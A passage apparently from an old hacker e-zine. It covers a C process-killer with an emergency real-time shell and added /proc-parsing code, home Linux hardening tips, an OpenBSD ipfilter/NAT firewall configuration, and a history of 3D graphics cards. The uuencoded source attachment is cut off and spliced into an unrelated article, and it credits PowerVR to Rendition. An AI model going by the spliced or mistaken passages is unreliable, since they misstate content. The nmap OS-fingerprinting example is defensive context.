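#define KILLER_GAP 1  /* killer runs this many levels below the shell (my choice) */

/* Real-time priority to request: the emergency shell takes the maximum
 * the kernel offers, the killer sits KILLER_GAP below it so the shell can
 * always preempt a runaway killer.  Returns -1 if SCHED_FIFO is
 * unavailable on this system. */
int choose_rt_priority(int emergency_shell)
{
    int max = sched_get_priority_max(SCHED_FIFO);
    int min = sched_get_priority_min(SCHED_FIFO);
    if (max < 0 || min < 0)
        return -1;
    int prio = emergency_shell ? max : max - KILLER_GAP;
    return prio < min ? min : prio;
}

/* Returns 1 if SCHED_FIFO was obtained, 2 if only setpriority() worked,
 * 0 if neither did (errno then describes the last failure). */
int raise_priority(int emergency_shell)
{
    struct sched_param sp;
    sp.sched_priority = choose_rt_priority(emergency_shell);
    if (sp.sched_priority >= 0 && sched_setscheduler(0, SCHED_FIFO, &sp) == 0)
        return 1;
    /* Fallback: stay in the time-sharing class with the best nice value
     * we can get.  The scheduler still interleaves us with everything
     * else, but we outrank the processes we are policing. */
    if (setpriority(PRIO_PROCESS, 0, emergency_shell ? -20 : -20 + KILLER_GAP) == 0)
        return 2;
    return 0;
}

/* Fork the emergency shell at the higher priority and exec it; the parent
 * carries on as the killer at the lower one.  Returns the child's pid,
 * or -1 if fork() failed. */
pid_t spawn_emergency_shell(const char *shell)
{
    pid_t pid = fork();
    if (pid == 0) {
        if (raise_priority(1) == 0)
            perror("emergency shell: could not raise priority");
        execl(shell, shell, (char *)0);
        perror("execl");
        _exit(127);
    }
    return pid;
}

int main(void)
{
    /* Spawn the shell before the killer enters SCHED_FIFO: a child forked
     * from a SCHED_FIFO parent inherits that class and only gets the CPU
     * to set itself up once the parent blocks. */
    pid_t shell = spawn_emergency_shell("/bin/sh");
    if (shell == -1) {
        perror("fork");
        return 1;
    }
    printf("emergency shell pid %ld\n", (long)shell);
    printf("killer priority mode: %d\n", raise_priority(0));
    return 0;
}
```

: Run it as root and the shell lands at the top of the SCHED_FIFO range
: with the killer one step below; run it as a normal user and both fall
: through to the setpriority() branch, which also fails for negative nice
: values, so raise_priority() reports 0 and the program keeps going at
: normal priority rather than refusing to start.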
: 
:     NAME
:         scandir, alphasort - scan a directory for matching entries
: 
:     SYNOPSIS
:         #include <dirent.h>
: 
:         int scandir(const char *dir, struct dirent ***namelist,
:                     int (*select)(const struct dirent *),
:                     int (*compar)(const struct dirent **,
:                                   const struct dirent **));
: 
: Scandir looks very convenient. It takes a directory name as its first
: argument and fills the vector namelist with lovely pre-malloc()ed data
: which you have to free() later on. Convenient, but expensive.
: 
:     NAME
:         readdir - read a directory
: 
:     SYNOPSIS
:         #include <sys/types.h>
:         #include <dirent.h>
: 
:         struct dirent *readdir(DIR *dir);
: 
: This call is obviously better for this program, as less data is
: allocated in RAM: readdir() returns a pointer to a static structure
: (which also means it is not re-entrant, so don't call it from two
: threads or from a signal handler). It is less convenient as far as
: searching or sorting goes, but for this program that is fine.
: 
: 3) And the question is: to run as root, or not to run as root.
: ---------------------------------------------------------------
: Obviously, to raise your priority you need root access, but for the rest
: of the program's functionality you can still be a normal user. So a
: simple compromise was made: you can run it as either, but you can't do
: as much as a normal user, i.e. you can only automatically kill your own
: processes (the kernel refuses kill() on other users' processes anyway).
: 
: 4) A 'real-time' shell
: ----------------------
: A real-time shell is easily provided by forking the process and
: elevating the child to maximum priority before exec'ing the shell. This
: gives the user the ability to kill their own program, should it happen
: to spin out of control. The shell has to outrank the killer itself: a
: shell at the same or a lower real-time priority never gets the CPU back
: from a looping killer.
: 
: This was done in my program by calling raise_priority(1) instead of
: raise_priority(0).
: 
: 5) Getting something useful from /proc
: --------------------------------------
: Firstly, to quickly brief on the /proc filesystem:
: 
: * Every numeric directory is a pid (process id).
: * Inside a pid pseudo-directory there are files which correspond to the
:   attributes of the process.
: * The (UID) owner of the pseudo-directory is the owner of the process.
: 
: In particular, the "stat" file is the one we're after. This file contains
: the attributes for start time, total CPU time, etc. Another important
: file is "/proc/uptime", which you need in order to calculate the values,
: as the /proc filesystem bases its timings on when the system was
: started. /proc/uptime is in seconds (with two decimals); the stat fields
: are in clock ticks, which on the x86 kernels of the day are 1/100th of a
: second (HZ=100; a program that wants to stay portable should ask for the
: rate with sysconf(_SC_CLK_TCK) rather than hard-coding 100). This also
: means the uptime and process timers will wrap around eventually.
: 
: At first glance, it's ambiguous. But after looking through the procps
: package, which contains the source code for "ps" and "top", it wasn't
: too difficult to work out the structure.
: 
:     bash$ cat /proc/1/stat
:     1 (init) S 0 0 0 0 -1 256 43 7891 160 18324 1 338 279 269 0 0 -1 0 30
:     901120 86 2147483647 134512640 134529764 3221225284 3221224232 1073873768
:     0 0 3622886140 671818755 1236245 0 0
: 
: The first value is the PID of the program (which should also be the
: directory name). The word in parentheses is the command name of the
: program: the first 15 characters of the executable's file name as it
: was execve()d. Be careful with it - it is the only text field, it can
: contain spaces and even ')' characters, and since the process picked its
: own file name it is attacker-influenced. Parse from the last ')' in the
: line, not the first.
: 
: The "S" character is the state character. It stands for "sleeping".
: Most processes tend to do this, that is, idle and sleep. Other processes
: have "R", which indicates that the process is runnable and using CPU
: time.
: 
: The values after the state character are the ones we really care about,
: so I'll number them from the state character onwards and explain only
: the values you need to know.
: 
: The 11th and 12th values are utime and stime respectively. Combined,
: they give the "total CPU time actually used". This is not the same as
: the "length of program time", which is derived from the 19th value, the
: start time.
: 
: The reason for this difference is that the "total CPU time actually
: used" is usually less than the "length of program time" because of
: multi-tasking: the process only gets slices of CPU time, rather than
: hogging it 100% of the time.
: 
: Two other values need to be known. The system uptime, which is the first
: value in "/proc/uptime", and the current system time, which is obtained
: via the C library's time() function.
: 
: From there we can devise a simple formula to calculate the values we
: need:
: 
:     process_seconds    = ((system_uptime * 100) - p_start) / 100;
:     process_tstart     = system_time - process_seconds;
:     process_total_time = p_utime + p_stime;     /* in 1/100th second */
: 
: * process_seconds is the total length of time the program has been
:   running (in whole seconds; the division is integer division). The
:   19th value we got from /proc/###/stat is a 1/100th-of-a-second count
:   from system boot, hence the use of system_uptime (which is in seconds,
:   so it is multiplied by 100) in the formula above.
: 
: * process_tstart is the start time, in time_t format (i.e. based on the
:   C library's time(), instead of the system uptime).
: 
: * process_total_time is the total amount of CPU time that has actually
:   been used, in 1/100ths of a second.
: 
: From those values, we can calculate the PCPU (percentage of the CPU
: used by the process over its lifetime) by dividing process_total_time
: (converted to seconds) by process_seconds and multiplying by 100 to get
: a percentage.
: 
: Because process_total_time is in 1/100ths of a second, its value is as
: if it had already been multiplied by 100, so the two steps cancel out
: and we don't need to do either:
: 
:     pcpu = process_seconds ? (process_total_time / process_seconds) : 0.0;
: 
: (The ?-condition checks whether process_seconds is zero, to prevent a
: division-by-zero error. Make sure at least one operand of that division
: is a floating-point type, or integer division truncates anything under
: 100% to 0. Note also that this is a lifetime average: a process that
: idled for a day and then started spinning will take a long time to cross
: any pcpu threshold.)
: 
: By using the above values, you can check a user-defined threshold for
: killing or nice()ing the process to something more appropriate.
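: The stat parsing and the arithmetic above, as an added example. This is
: not icebsd's process_killer2.c; the sample stat lines and the uptime
: value are constructed, and the names parse_stat, compute_usage and
: exceeds are mine. It parses one /proc/<pid>/stat line (from the last ')'
: so a hostile command name cannot shift the fields), computes
: process_seconds and pcpu with the formula above generalised to any tick
: rate instead of a hard-coded 100, and implements the threshold test the
: article applies next.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Added example, not the zine's process_killer2.c.  The command name in
 * parentheses is chosen by the process itself and may contain spaces or
 * ')', so the parser finds the LAST ')' rather than the first; otherwise
 * a process called e.g. "x) R 0 0" could feed the killer attacker-chosen
 * numbers as utime, stime and starttime. */

struct pstat {
    long pid;
    char comm[64];
    char state;
    unsigned long utime;            /* ticks spent in user mode */
    unsigned long stime;            /* ticks spent in kernel mode */
    unsigned long long starttime;   /* ticks after boot when it started */
};

/* Returns 0 on success, -1 if the line is malformed. */
int parse_stat(const char *line, struct pstat *ps)
{
    const char *open = strchr(line, '(');
    const char *close = strrchr(line, ')');
    if (!open || !close || close < open)
        return -1;
    if (sscanf(line, "%ld", &ps->pid) != 1)
        return -1;
    size_t n = (size_t)(close - open - 1);
    if (n >= sizeof ps->comm)
        n = sizeof ps->comm - 1;
    memcpy(ps->comm, open + 1, n);
    ps->comm[n] = '\0';
    /* After ')': state ppid pgrp session tty_nr tpgid flags minflt cminflt
     * majflt cmajflt utime stime cutime cstime priority nice timeout
     * itrealvalue starttime ... (the article's 11th, 12th and 19th values) */
    int got = sscanf(close + 1,
        " %c %*d %*d %*d %*d %*d %*u %*lu %*lu %*lu %*lu %lu %lu"
        " %*ld %*ld %*ld %*ld %*ld %*ld %llu",
        &ps->state, &ps->utime, &ps->stime, &ps->starttime);
    return got == 4 ? 0 : -1;
}

struct usage {
    long seconds_alive;      /* wall-clock seconds since the process started */
    unsigned long cpu_ticks; /* utime + stime */
    double pcpu;             /* lifetime average CPU share, in percent */
};

/* uptime_seconds is the first field of /proc/uptime; hz is the tick rate:
 * 100 on the 2.2/2.4 x86 kernels the article targets, sysconf(_SC_CLK_TCK)
 * on anything else. */
struct usage compute_usage(const struct pstat *ps, double uptime_seconds, long hz)
{
    struct usage u;
    long long uptime_ticks = (long long)(uptime_seconds * (double)hz);
    long long alive_ticks = uptime_ticks - (long long)ps->starttime;
    if (alive_ticks < 0)
        alive_ticks = 0;   /* counter wrapped, or stat was read after uptime */
    u.seconds_alive = (long)(alive_ticks / hz);
    u.cpu_ticks = ps->utime + ps->stime;
    /* Same quantity as the article's pcpu: cpu_ticks/hz is CPU seconds,
     * divided by seconds alive, times 100 for a percentage. */
    u.pcpu = u.seconds_alive
           ? 100.0 * ((double)u.cpu_ticks / (double)hz) / (double)u.seconds_alive
           : 0.0;
    return u;
}

/* The article's threshold test: a process qualifies only when it has been
 * alive at least min_seconds AND has averaged at least min_pcpu. */
int exceeds(const struct usage *u, long min_seconds, double min_pcpu)
{
    return u->seconds_alive >= min_seconds && u->pcpu >= min_pcpu;
}

/* Stand-alone demo on this process itself (needs a Linux /proc). */
int main(void)
{
    char line[1024];
    double uptime = 0.0;
    FILE *f = fopen("/proc/uptime", "r");
    if (!f || fscanf(f, "%lf", &uptime) != 1) { perror("/proc/uptime"); return 1; }
    fclose(f);
    f = fopen("/proc/self/stat", "r");
    if (!f || !fgets(line, sizeof line, f)) { perror("/proc/self/stat"); return 1; }
    fclose(f);
    struct pstat ps;
    if (parse_stat(line, &ps) != 0) { fputs("unparseable stat line\n", stderr); return 1; }
    struct usage u = compute_usage(&ps, uptime, sysconf(_SC_CLK_TCK));
    printf("%ld (%s) alive %lds, cpu %lu ticks, pcpu %.2f%%\n",
           ps.pid, ps.comm, u.seconds_alive, u.cpu_ticks, u.pcpu);
    return 0;
}
```

: Feeding it the /proc/1/stat line shown above with a constructed uptime
: of 1234.5 seconds gives 1234 seconds alive, 339 ticks of CPU and a pcpu
: of about 0.27%; a process named "x) R 0 0" parses with its real state
: and counters rather than the numbers smuggled into its name.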
: 
:     /* check for nice threshold */
:     if ((process_seconds < NICE_TIME) || (pcpu < NICE_PCPU)) {
:         continue;
:     }
:     else {
:         /* nice() the process using setpriority() */
:         /* note: should probably check via getpriority() first,
:          * but it doesn't really matter, since you don't save a
:          * system call either way.
:          */
:         if (setpriority(PRIO_PROCESS, pid, NICE_VAL) == -1) {
:             perror("setpriority - nice failed");
:         }
:     }
: 
:     /* check for kill threshold */
:     if ((process_seconds < KILL_TIME) || (pcpu < KILL_PCPU)) {
:         continue;
:     }
:     else {
:         /* kill the process */
:         if (kill((pid_t) pid, KILL_SIG) == -1) {
:             perror("kill() failed");
:         }
:         else {
:             printf("Process has been killed\n");
:         ...
: 
: (Because the nice test continues on failure, the kill test is only ever
: reached by processes that already passed the nice thresholds, so the
: kill thresholds have to be the stricter of the two. Also note that the
: pid was read from /proc some time before kill() runs; if that process
: exits and the pid is recycled in between, the signal hits whatever
: process inherited the number.)
: 
: 6) The obvious.
: ---------------
: 
: As stated previously, the program should be wary of killing processes
: that have a UID of 0, because they are "root"-owned processes, and
: killing them could be quite nasty. Obviously, another if-condition could
: be used to check whether the process's UID is below a certain value, to
: make sure all system accounts are safe from this program (e.g. those
: running as "bin", "news" or whatever). This has been left as an exercise
: for the reader.
: 
: Syslogging was achieved quite easily with syslog(), and was a
: miscellaneous feature I thought of near the end of the program's
: construction.
: 
: Portability is a problem, obviously, since only a system with a /proc
: filesystem can use this program.
: 
: The TEST_ONLY option doesn't work, as I was too lazy to put in another
: #ifdef somewhere. :)
: 
: There are many possible extensions to this program that weren't made,
: such as keeping the state of the processes in memory to compare their
: PCPU over a shorter interval instead of over their lifetime, which would
: help in spotting "surges" in CPU usage for logging or other purposes.
: But for reasons #1 and #2, this was not planned.
: 
: Another fun extension would be to find out if the process has child
: processes, and kill them if they exceed a user-defined limit. This would
: allow it to kill off forkbombs, etc.
: 
: Source
: ------
: The source "process_killer2.c.gz" is attached at the end of this
: textfile, so to output it to a file, use 'uudecode' and 'gzip' like
: this:
: 
:     uudecode infosurge-8.txt ; gzip -dc process_killer2.c.gz > process_killer2.c
: 
: where "infosurge-8.txt" is the filename of this text file.
: 
: Conclusion
: -----------
: 
: "Keep it simple: as simple as possible, but no simpler."
: -- A. Einstein
: 
: Whether you would actually use this program in the wild is up to you.
: Considering that I wrote this program in a few hours, you should
: probably take heed and look for bugs.
: 
: As for whether or not the system administrator can pass the blame to the
: program for its actions... that remains to be seen. :)
: 
: begin 664 process_killer2.c.gz
:     suid.txt
:     done
:     echo "View suid.txt for a list of services running as root"
:     echo "If you decide you don't need the file as root, use the following:"
:     echo "chmod o-x <file>; chgrp wheel <file>"
: 
: As I've mentioned in the Inet Daemons section, if you don't know what a
: program does, look it up.
: 
: # Recommended Home Setup
: A) Make sure to choose the right operating system for you. I run
: Slackware 7.1. My next favourite Linux distribution is Debian 2.2.
: 
: B) Firewall your box. If you're a console user, have a read-only TTY
: designated for your messages log to be piped to. If you are an X hippie
: (like me), have a virtual desktop with your log-filtering program on
: it. I have Gnome's System Log utility running all the time, and check up
: on it often.
: Also, 'man syslog.conf', and see how you'd like syslogd set up.
: 
: C) As I stated earlier, shut down all of the inet daemons you can. If
: you rarely give SSH access to users, then activate it manually instead
: of having it running all the time. My personal preference is to have SSH
: installed but disabled. If anybody requires access to my system I simply
: enable SSH and set up the TCP wrappers to only accept connections from
: their IP. (Writing a quick bash script to automate this process is a
: nice idea.)
: 
: SMTP, as I said earlier, who needs it? You're a home user. Simply use
: your ISP's SMTP server.
: 
: Like a lot of us, we are interested in web development, so we need an
: httpd running. I use Apache + MySQL + PHP.
: 
: So that's it. What does your average home user require enabled to the
: outside world? Nothing. Unless of course you are a web developer, as I
: mentioned in the above paragraph; in that case you would require httpd
: and SQL running. No big deal. (Even then, the SQL server only needs to
: listen on the local machine if the web server lives on the same box.)
: 
: D) Go through all of those programs in suid.txt and change the
: permissions and the group of each file that doesn't need to be set-uid.
: 
: E) Patch your daemons and system services. Go to securityfocus.com and
: look for patches for the daemons you are running. Also check your OS's
: website (e.g. www.redhat.com or www.openbsd.org) for updated kernels,
: etc.
: 
: F) Try running OpenBSD as a gateway machine. George (aphex) has written
: a text on how to set up an OpenBSD gateway in this infosurge issue (8).
: 
: # Extra Ideas
: 
: A) Conceal what OS you are running: The first thing a cracker will do to
: break your system's security is run some portscans. Usually they will
: use something like nmap -O xxx.xxx.xxx.xxx, the -O being an OS
: fingerprint (which bases its results on characteristics of the TCP/IP
: stack).
: Knowing what operating system is running on a targeted machine is more
: than likely the most valuable piece of information if you are planning
: to gain access to a system, mainly because the attacker can pick or
: adapt an exploit's shellcode depending on the remote operating system.
: 
: It's possible to detect these nmap scans with an IDS, since, for
: example, they often send packets with odd combinations of TCP flags not
: often seen "in the wild". Depending on how the operating system
: responds, nmap is more often than not able to make an educated guess
: about what operating system is running. On Windows, BlackICE (a decent
: home firewall) has a feature to detect nmap fingerprints. Under Unix,
: Portsentry (mentioned above) and Snort (also mentioned above) readily
: detect most scans.
: 
: As I was saying, quite some time ago Rendrag introduced me to a Linux
: kernel patch which basically changes the way the OS replies to these TCP
: flags. Damien has this "stealth patch" built into his Linux kernel,
: running underneath Debian 2.2. It mainly blocks TCP RST packets, which
: slows down the scan and makes the ports time out while waiting for a
: response. This way it makes -O particularly unreliable. (Bear in mind
: that this only confuses the fingerprint; the scan itself still shows up
: in your logs, and the banners of whatever services you do run will give
: the OS away just as readily.)
: 
: The example of this: (Please don't nmap his box)
: 
:     # nmap -O vorlon.rendrag.net
:     Starting nmap V. 2.54BETA7 (www.insecure.org/nmap/ )
: 
:     /* Lets just skip the open ports */
: 
:     No OS matches for host (If you know what OS is running on it, see
:     http://www.insecure.org/cgi-bin/nmap-submit.cgi).
: 
: Dogcow from Wiretapped.net/2600.org.au has these files available at:
: http://the.wiretapped.net/security/operating-systems/stealth-kernel-patches/
: 
: Another thing to try is to change the /etc/issue and /etc/issue.net
: files. These files hold the banner shown by telnet (and when you start a
: new TTY), and by default it has the operating system, kernel version,
: etc. So change this, or set it blank - whatever!
: I like the program linux_logo, which makes a nice banner for your issue
: files. You can get it to show additional information, or no information
: at all, about your system details. (Red Hat users: edit
: /etc/rc.d/rc.local and comment out the lines which rewrite these files
: at every boot, or your banner will be overwritten.) linux_logo is
: available at linuxberg and also freshmeat.
: 
: B) Write shell scripts to help you complete tasks: Writing your own
: scripts can help you do complex tasks quickly. The way I set them up is
: by defining aliases that point to shell scripts. For example,
: alias killuser="/home/lymco/bash-files/killuser.sh" would be in my bash
: init file (.bashrc or whatever you prefer). Not only does this method
: give you an automated process, it saves you time++.
: 
: C) Subscribe to mailing lists. A good proportion of what I have learned
: has been gathered from mailing lists. They can introduce you to new
: areas of computing which you might never have thought of. You can get
: questions answered, or like me, lurk in the background and learn from
: the posts.
: 
: I recommend visiting securityfocus.com and/or insecure.org and checking
: out the mailing lists available. May I further note, it might be an idea
: to read through some recent archives of the mailing lists, just to make
: sure it's the right one for you. I'm signed up to several mailing lists,
: including 2600-AU, Bugtraq, Vuln-Dev, IDS, and Linux Kernel Security.
: All have been great, and have kept me "on the ball" with security issues
: on the internet.
: 
: D) Learn from your own computer. A good way to improve your security is
: to try to crack it locally. That is, log on as a standard user and try
: to get root. Not only do you update your knowledge of vulnerabilities,
: you also test your sysadmin skills. Once you think it's _secure_, ask a
: friend on IRC (one with skillz) to break your system's security. If
: he/she does, ask how they did it, and learn from them.
: 
: E) Learn C. I have not met a _GOOD_ "hacker" who is not a C guru.
: By knowing C inside out and back to front you understand how computers
: _really_ work. You can look at some source code and say, "wait a minute,
: that strcpy() function is looking a bit dodgy", or what have you. Learn
: C, learn assembly, learn how to code. It will get you a long way.
: 
: F) The right operating system. No matter what people say, I still
: believe Red Hat can be a secure server if it is in the hands of a good
: admin. Debian is a good option as well. Nonetheless OpenBSD > *, in
: regards to security. Even if you are a home user, it may be an idea to
: throw OBSD on a cheap box as your gateway.
: 
: For a Linux workstation, try out Debian 2.2 or Slackware 7.1.
: 
: # Links
: http://infosurge.rendrag.net
: http://www.wiretapped.net
: http://www.2600.org.au
: http://www.freshmeat.net
: http://www.linuxberg.com
: http://www.securityfocus.com
: 
: Hopefully the above information taught you something. It wasn't
: intended to be too full-on, by the way. If you have any comments or
: questions, e-mail me at lym@thepentagon.com.
: 
: "Over and out!",
: 
: -- lymco http://dev.spanner.net
: 
:....
: ...[ ]........................................................................
: :
: : #07 Example configuration of an OpenBSD firewall - aphex
: : ----------------------------------------------
: :.[_]........................................................................:
: ...:
: 
: ->> intro
: The rules I use are rather slack, but more secure than 70%+ of the hosts
: out there. All this will work on the default install of OpenBSD 2.6 ->
: current. But if your machine is rather busy, you really should recompile
: the kernel with 'option NMBCLUSTERS=8192', otherwise you'll get errors
: like 'mb_map full' or the system might just hang. Other than that, there
: is no need to recompile your kernel to get this to work;  GENERIC is
: fine. It is mainly designed for users with small home networks or small
: businesses, with dialup users in mind (sorry k, ikari).
: 
: ->> ip forwarding
: IP forwarding needs to be turned on. You can do this using sysctl, by
: typing 'sysctl -w net.inet.ip.forwarding=1', OR you can edit the file
: /etc/sysctl.conf by adding:
: 
:     net.inet.ip.forwarding=1
: 
: ->> ipfilter, ipnat and ipmon
: ipf (ipfilter) does just what its name suggests: it is a packet filter.
: To turn it on, simply:
: 
:     ipf -Fa -f /etc/ipf.rules -E
: 
: This will flush the ruleset, load /etc/ipf.rules and enable the filter.
: You should add 'ipfilter=YES' to rc.conf so it is started at boot. More
: on /etc/ipf.rules later. ipnat performs NAT. To turn it on:
: 
:     ipnat -CF -f /etc/ipnat.rules
: 
: which will also flush the NAT rules and load the ones in
: /etc/ipnat.rules. Also add 'ipnat=YES' to rc.conf. Again, more on this
: later. And just for debugging purposes enable ipmon with:
: 
:     ipmon -Ds
: 
: ->> /etc/ipf.rules
: The main advantage that ipf has over ipchains is the simplicity of the
: rules. Even if you know nothing about ipf, you can have a look at a
: large ruleset and half-understand it; of course at least half a brain
: is required. Here's an example:
: 
:     pass out from any to any
:     pass in from any to any
: 
: Now, not to state the obvious, but this roughly means 'allow any
: connection out through any interface' and 'allow any connection in on
: any interface into the machine'. You see this, don't you? Well, that's
: all there is to ipf. The rest is just options, changed and added lines
: to this default configuration. Well, I lie: there really are quite a lot
: of complex options and a bit of skill required for hardcore
: configurations. But most of the people reading this don't have national
: security clearance or Windows 2002 source code to protect. Yes, I know
: you have 0day pron, but that doesn't count.
: 
: One thing you do have to know before reading a real ruleset: ipf walks
: every rule in order and the LAST rule that matches wins, unless a
: matching rule says 'quick', in which case evaluation stops there and that
: rule wins. Nearly every rule below uses quick, so it reads top-down like
: a conventional first-match firewall; a rule without quick that sits
: above a quick block rule can never win. Coming up is a decently secure
: configuration.
: It's fairly stock and has nothing too fancy, but it has some good
: examples in it:
: 
: (Ed Note: "#" is used here as a comment in a configuration file rather
: than a command to be typed at a root prompt, as in other areas of IS 8)
: 
:     # For reference:
:     # ne3  = ethernet to internal network
:     # tun0 = ppp interface to internet
:     # 192.168.0.* = internal network.
:     # IP filtering rules.
: 
:     # loopback rules
:     pass out quick on lo0
:     pass in quick on lo0
: 
:     # block tiny fragments
:     block in log quick proto tcp all with short
: 
:     # drop source routed packets
:     block in log quick on tun0 all with opt lsrr
:     block in log quick on tun0 all with opt ssrr
: 
:     # dont allow anyone to spoof non-routable addresses
:     block in quick on tun0 from 0.0.0.0/32 to any
:     block in quick on tun0 from 127.0.0.0/8 to any
:     block in quick on tun0 from 192.168.0.0/16 to any
:     block in quick on tun0 from 172.16.0.0/12 to any
:     block in quick on tun0 from 10.0.0.0/8 to any
:     block out quick on tun0 from any to 127.0.0.0/8
:     block out quick on tun0 from any to 192.168.0.0/16
:     block out quick on tun0 from any to 172.16.0.0/12
:     block out quick on tun0 from any to 10.0.0.0/8
: 
:     # allow certain classes of ICMP
:     pass in quick on tun0 proto icmp all icmp-type 0
:     pass in quick on tun0 proto icmp all icmp-type 3
:     pass in quick on tun0 proto icmp all icmp-type 11
: 
:     # allow all access from internal interface
:     pass in quick on ne3 from 192.168.0.0/16 to any
: 
:     # allow outside access to http, ssh and mail
:     # ('flags' is only accepted with 'proto tcp'; keep state so the rest
:     # of each accepted connection is matched from the state table)
:     pass in quick on tun0 proto tcp from any to any port = 80 flags S/SA keep state
:     pass in quick on tun0 proto tcp from any to any port = 22 flags S/SA keep state
:     pass in quick on tun0 proto tcp from any to any port = 25 flags S/SA keep state
: 
:     # allow DNS from my optus nameservers
:     # (quick is needed here too, or the final block rule wins)
:     pass in quick on tun0 proto udp from 203.2.75.2 port = 53 to any
:     pass in quick on tun0 proto udp from 203.2.75.12 port = 53 to any
: 
:     # let outgoing traffic out
:     pass out quick on tun0 proto tcp from any to any flags S keep state
:     pass out quick on tun0 proto udp from any to any keep state
:     pass out quick on tun0 proto icmp from any to any keep state
: 
:     # block all by default
:     block in log quick on tun0 from any to any
:     # end ruleset
: 
: If any packet doesn't fit into one of these rules, then it is dumped
: and logged. There are rules to politely reject connections etc, but
: don't bother. The 'log' option is handy for those who are paranoid out
: there. As you can see you can tell ipf a lot of information: which port,
: what protocol, what address, etc. Once that's all added to
: /etc/ipf.rules, restart ipf. You can check that your rules are in place
: by typing:
: 
:     ipfstat -io
: 
: which will display the current active rules. Two things to watch for in
: a ruleset like this: 'flags S/SA' is only accepted on 'proto tcp' rules,
: and because the last rule is a 'quick' block, every pass rule above it
: has to be 'quick' as well or it loses to the block.
: 
: ->> /etc/ipnat.rules
: This file is a lot smaller than ipf.rules, merely because there is not
: much to configure.
: 
:     # Reference:
:     # tun0 = ppp interface to internet
:     # 0/32 = if your ip is dynamic, otherwise put your ip here.
:     # 192.168.0.* = internal network
:     # ipnat ruleset
: 
:     # port map
:     map tun0 192.168.0.0/24 -> 0/32 portmap tcp/udp 1025:65000
:     # handle ICMP, etc.
:     map tun0 192.168.0.0/24 -> 0/32
:     # This will make ipnat act as a proxy for active FTP sessions
:     map tun0 192.168.0.0/24 -> 0/32 proxy port ftp ftp/tcp
:     # end ruleset
: 
: Here you see only three lines: one to map ports, one to handle all other
: things, and one for a transparent FTP proxy. I should also mention that
: if you want to redirect connection attempts, because for example you
: host your small website off a server machine on your internal network,
: add a derivative of the following line to /etc/ipnat.rules:
: 
:     rdr tun0 0.0.0.0/0 port 80 -> 192.168.0.2 port 8080 tcp
: 
: The address before the first 'port' is the destination address the
: packet arrived with on tun0; 0.0.0.0/0 matches whatever address your
: dialup was given this time, and 192.168.0.2 is the web server on your
: network. This maps port 80 on the external (tun0) interface of your
: firewall to port 8080 on that server. Remember that on inbound packets
: ipf applies NAT before filtering, so the ipf rules see the translated
: packet and have to pass traffic in to 192.168.0.2 port 8080, not port
: 80 on the firewall. The last thing that needs to be done is to run
: 'ipf -y' every time you get allocated a new IP address. You can do this
: manually, OR by adding 'bg ipf -y' to your /etc/ppp/ppp.conf script
: /inside/ your settings for your ISP.
: 
: ->> outro
: That's all the basics you'll need to know.
: If you really want to protect your data, go with the most secure setup:
: unplug the computer from any network. Even z3r0c00l can't transmit
: packets over thin air. For the average user, this sort of setup will be
: good enough.
: 
: -aphex -http://pulsewidth.net
: 
:....
: ...[ ]........................................................................
: :
: : #08 History of 3d acceleration - Maticles
: : ----------------------------
: :.[_]........................................................................:
: ...:
: 
: Introduction
: 
: 'llo - 'tis I, Mat (Maticles if you prefer). I used to be common on
: #infosurge, but got bored, and now Damien has me locked up in his
: closet, treating me like a monkey and making me write a 'History of 3D
: acceleration' review. Woohoo. 3D cards primarily surfaced in late 1995
: with the advent of 3dfx's Voodoo. I must admit, professional machines
: such as the Silicon Graphics Onyx did have 3D acceleration, but you'd be
: paying $15000 US for the privilege of owning such a card.
: 
: About the first consumer 3D accelerator - 3Dfx's 'Voodoo Graphics Chip'
: 
: The first 3D accelerator came from the Silicon Valley start-up company
: 3Dfx Interactive, who developed the Voodoo-based chip. The Voodoo
: generally had a hand-blistering 4MB of onboard memory (compared to 32MB
: and 64MB by today's standards) and had features such as accelerated MIP
: mapping and alpha transparencies. I bought such a beast in 1996 (or
: maybe it was 1997, I forget) for a whopping $210, which was expensive
: for a video card in those days; it was a yum-cha Atrend Helios. It
: allowed whopping detail in games such as Need For Speed 2:SE and
: GLQuake, both of which looked so, err, 'life-like' it was scary. There
: were 'cool' things such as alpha-blended fog, fancy-dan textures, and
: the whole thing just looked so schmick over its 2D variant.
: 
: How the whole thing turned into a race.
nVidia had just surfaced with its Riva 128, Rendition with its PowerVR, Matrox with the Mystique and a few other non-starters. This gave serious competition in the DirectX segment, but with 3Dfx Interactive holding the rights to glide, these chips didn't hold much of a chance, until Microsoft. Microsoft got its act together and released Direct3d, which was easier to code than glide, and it would run on a lot more systems, seeing as all of the 3d accelerators were Direct3d compliant. This got developers interested, so they started to code in Direct3d. (Some were cunning enough to do Direct3d and glide - glide was A LOT faster on the Voodoo than Direct3d on the Voodoo.) Things were going well for nVidia, Rendition and Matrox with their cards, finding a nice little place in the market. Then 3Dfx made a return.

3Dfx's next plan.

3Dfx released the Voodoo2 chipset, which was capable of running in SLI. A little more on SLI later. The power of 2 'Voodoo 2' was simply awesome, to put it in 2 words. The frame rate was an astonishing 40fps at 640x480 in games such as Forsaken or Turok; this was simply unheard of in the past. Other chipset makers (nVidia, Matrox and newcomers to the 3D market, S3 and ATi) created new cards also, but after 3Dfx had made a nice profit. Unfortunately Rendition basically stalled at the starting line, and failed to bring out a 3rd revision of PowerVR (2nd being PowerVR PCX2). S3 had just started with the Savage 3d and the Virge series. Virge really sucked in 3d, as did Savage 3d, so we won't speak about them much, as they weren't particularly ground-breaking products. ATi released the Rage, which ended up being a massive success in OEMs and laptops because of their cheapness, and they were alright for 3d applications. All these cards on the market from various companies started a 3d accelerator war, which meant new features came in place. Bit more after this...
SLI

SLI was 3Dfx's main feature in the Voodoo 2's. SLI means Scan Line Interleave, which basically is 1 'Voodoo 2' card doing 1 line, while the other is doing the line under, as such:

----^^^^^^--  <-- 'Voodoo 2' card number 1
----.----.--  <-- 'Voodoo 2' card number 2
------->----  <-- 'Voodoo 2' card number 1
------------  <-- 'Voodoo 2' card number 2
----\____/--  <-- 'Voodoo 2' card number 1

And so forth. This allowed the speed to be basically doubled.

The after effects of the first 3D war.

After this came nVidia's TNT and TNT2, Matrox's G200 and 3Dfx's Voodoo3 as the major contenders. The Voodoo3 this time was a lot worse than the TNT and TNT2 because it was being held back by 16-bit. Bad 3Dfx. Bad. 16-bit sucks, it looks washed out and grainy, believe me, get a TNT/2 or Geforce offering and see, much yumness in 32-bit indeed. This section is rather boring as it's much the same as the first war, so I'll get to today's technologies.

What yummy goodness we have today

